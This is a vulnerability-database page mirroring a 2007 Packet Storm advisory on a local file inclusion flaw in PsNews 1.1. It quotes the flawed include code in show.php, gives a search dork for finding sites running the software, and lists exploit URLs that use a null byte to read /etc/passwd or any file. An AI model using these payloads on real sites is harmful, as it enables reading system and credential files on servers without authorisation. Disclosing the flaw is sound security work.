Lucene search

K

psnews-lfi.txt

πŸ—“οΈΒ 13 Jul 2007Β 00:00:00Reported byΒ irk4zTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 24Β Views

PsNews 1.1 Local File Inclusion vulnerability, download at strefaphp.ne

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`# o [bug] /"*._ _ #  
# . . . .-*'` `*-.._.-'/ #  
# o o < * )) , ( #  
# . o `*-._`._(__.--*"`.\ #  
# #  
# vuln.: PsNews 1.1 (show.php newspath) Local File Inclusion #  
# author: [email protected] #  
# download: #  
# http://www.strefaphp.net/index.php?page=download&what=download&fid=12 #  
# dork: "Powered by PsNews" ;] #  
  
/news/show.php:  
...  
if(eregi("://", $newspath)){  
die("Nieautoryzowany dostΔ™p!");  
}  
if(!isset($newspath)){  
$newspath = "news";  
}  
include("$newspath/functions.php");  
...  
  
# exploit:  
  
http://[site]/[path]/news/show.php?newspath=/etc/passwd%00  
http://[site]/[path]/news/show.php?newspath=[file]%00  
  
  
# greetz: cOndemned, DooMRiderZ vx team (great zin :D), polish underground :*  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
13 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4
24
.json
Report